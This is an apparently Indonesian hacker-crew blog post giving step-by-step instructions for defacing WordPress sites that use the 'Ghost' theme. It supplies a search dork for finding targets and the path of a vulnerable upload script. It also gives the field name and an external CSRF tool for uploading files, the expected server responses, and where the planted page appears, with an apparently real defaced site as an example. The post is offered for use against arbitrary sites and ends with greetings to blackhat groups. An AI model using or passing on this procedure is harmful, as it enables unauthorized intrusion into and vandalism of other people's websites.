Cara deface WP-themes Ghost
Tutorial deface wp-thems/Ghost
Assalamualaikum.
Hallo gayy (wkwk) balik lagi bersama saya
Kali ini gue akan kasih tau cara deface
wp-thems/Ghost(upload file CSRF)
Ya tanpa banyak bacot kita langsung aja ya:v
=Alat dan Bahan=
=Dork
=Exploit
=CSRF
=Browser
=Internet/kuota
==Dork :
inurl:wp-content/themes/Ghost/
(Kembangin lagi)
==Exploit:
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
==CSRF: pencet aku mass
http://elisehofman.com/tools/csrf/
===Step by step===
1. Pertama kita Dork dulu
[ inurl:wp-content/themes/Ghost/ ]
2. Kedua kita pilih webb yang kita suka
3. Setelah dapat kita masukan Exploit nya,,
Contoh : https:/www.Target.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
3. Jika sudah di kasih Exploit webb nya gini ini ciri²nya kalo webb nya fulen ya..
Ada tulisan/teks :
{"status":"NOK", "ERR":"This file is incorect"}
4. Setelah Pasang Exploit langsung ajah ke CSRF nya
Post filenya : Filedata
5. Setelah upload akan ada tulisan/teks seperti ini..
Ada tulisan/teks :
{"status":"OK","imageID":"132html","imageName":"132.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\t132.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\t<\/tr>\n"}
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\t<\/tr>\n"}
===Cara akses===
Tambahkan/ganti Exploit dengan
: /wp-content/uploads/settingsimages/File lu.html
Punyaku: Contoh
http://www.juvankoski.com/wp-content/uploads/settingsimages/132.html
Selamat mencoba :v
==Sekian dari saya wassalamualaikum.==
==Grazz to==
-K3B0L3D4N CYBER TEAM-
-GARUDA BLACKHAT-
-FASTER BLACKHAT-
-C.A.I CYBER ATTACK INDONESIA-
-WARRIORS GARUDA CRIME-
-SABUN BOLONG CYBER CLUB-
-ATTACKER JOKER MAFIA-
=